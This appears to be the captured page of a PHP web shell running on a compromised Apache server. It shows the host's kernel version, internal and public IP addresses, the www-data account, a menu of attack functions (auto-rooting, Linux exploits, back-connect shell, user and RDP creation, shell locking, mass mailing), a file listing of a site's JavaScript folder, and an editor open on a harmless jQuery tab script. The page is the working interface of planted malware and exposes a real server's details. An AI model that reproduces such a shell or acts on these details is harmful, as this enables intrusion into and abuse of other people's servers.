Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.118.144.50
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
gack /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
Chart.Core.js
70.32
KB
-rwxr-xr-x
Chart.Doughnut.js
6.2
KB
-rwxr-xr-x
Chart.js
115.34
KB
-rwxr-xr-x
cms.js
18.45
KB
-rwxr-xr-x
control.js
18.43
KB
-rwxr-xr-x
dytable.js
21.59
KB
-rwxr-xr-x
form_submit.js
1.3
KB
-rwxr-xr-x
functions.js
391
B
-rwxr-xr-x
home.js
6.58
KB
-rwxr-xr-x
index.js
3.87
KB
-rwxr-xr-x
jquery-1.7.2.min.js
92.62
KB
-rwxr-xr-x
jquery.flexslider-min.js
10.87
KB
-rwxr-xr-x
loadtable.js
10.47
KB
-rwxr-xr-x
modernizr.custom.js
6.76
KB
-rwxr-xr-x
script.js
1.08
KB
-rwxr-xr-x
validate.js
10.64
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
$(function () { var items = $("#v-nav>ul>li").each(function () { $(this).click(function () { //remove previous class and add it to clicked tab items.removeClass('current'); $(this).addClass('current'); //document.getElementById("treg").className = "verror"; //hide all content divs and show current one $("#v-nav>div.tab-content").hide().eq(items.index($(this))).show('fast'); window.location.hash = $(this).attr('tab'); }); }); if (location.hash) { showTab(location.hash); } else { showTab("tab1"); } function showTab(tab) { $("#v-nav ul li<div id='tab-' class='wpb_tab ui-tabs-panel wpb_ui-tabs-hide clearfix'>Empty section. Edit page to add content here.</div>").click(); } // Bind the event hashchange, using jquery-hashchange-plugin $(window).hashchange(function () { showTab(location.hash.replace("#", "")); }) // Trigger the event hashchange on page load, using jquery-hashchange-plugin $(window).hashchange(); });
Close